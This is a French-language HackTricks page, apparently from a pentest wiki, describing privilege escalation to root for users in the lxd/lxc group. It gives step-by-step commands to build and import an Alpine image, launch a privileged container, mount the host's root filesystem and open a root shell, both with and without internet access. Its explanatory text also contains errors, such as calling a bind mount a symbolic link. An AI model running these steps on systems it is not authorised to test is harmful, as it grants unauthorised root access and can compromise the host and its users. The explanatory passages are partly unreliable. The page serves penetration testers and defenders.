6.7 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au dépôt hacktricks et au dépôt hacktricks-cloud.
Si vous appartenez au groupe lxd ou lxc, vous pouvez devenir root
Exploitation sans internet
Vous pouvez installer sur votre machine ce générateur de distribution : https://github.com/lxc/distrobuilder suivez les instructions du github
:
#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
go get -d -v github.com/lxc/distrobuilder
#Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml
Ensuite, téléchargez sur le serveur les fichiers lxd.tar.xz et rootfs.squashfs
Ajoutez l'image:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
Créer un conteneur et ajouter le chemin racine
Lorsque vous créez un conteneur LXD, vous pouvez spécifier un chemin racine personnalisé pour le conteneur. Si vous spécifiez un chemin racine qui est un répertoire sur le système hôte, vous pouvez accéder à ce répertoire depuis le conteneur en tant que superutilisateur.
Pour créer un conteneur avec un chemin racine personnalisé, utilisez la commande suivante :
$ lxc launch <image> <container> -c security.privileged=true -c security.privileged.default=“true” -c raw.lxc=“lxc.mount.entry=/root/rootfs /var/lib/lxc/<container>/rootfs none bind,create=dir 0 0”
Dans cette commande, remplacez <image>
par le nom de l'image que vous souhaitez utiliser pour le conteneur, et <container>
par le nom que vous souhaitez donner au conteneur.
La partie importante de cette commande est l'option -c raw.lxc
. Cette option permet de spécifier des options LXC brutes pour le conteneur. Dans ce cas, nous utilisons l'option lxc.mount.entry
pour monter le répertoire /root/rootfs
du système hôte dans le répertoire /var/lib/lxc/<container>/rootfs
du conteneur. L'option none
spécifie que nous ne voulons pas monter le répertoire avec des options spécifiques, et bind,create=dir
spécifie que nous voulons monter le répertoire en tant que lien symbolique et créer le répertoire s'il n'existe pas déjà.
Une fois que vous avez créé le conteneur, vous pouvez vous y connecter en tant que superutilisateur et accéder au répertoire /root/rootfs
du système hôte :
$ lxc exec <container> -- /bin/bash
# cd /root/rootfs
# ls
Vous pouvez également accéder au répertoire depuis n'importe quel processus s'exécutant dans le conteneur, même s'il ne s'exécute pas en tant que superutilisateur.
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Exécutez le conteneur :
lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
Avec internet
Vous pouvez suivre ces instructions.
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
Autres références
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.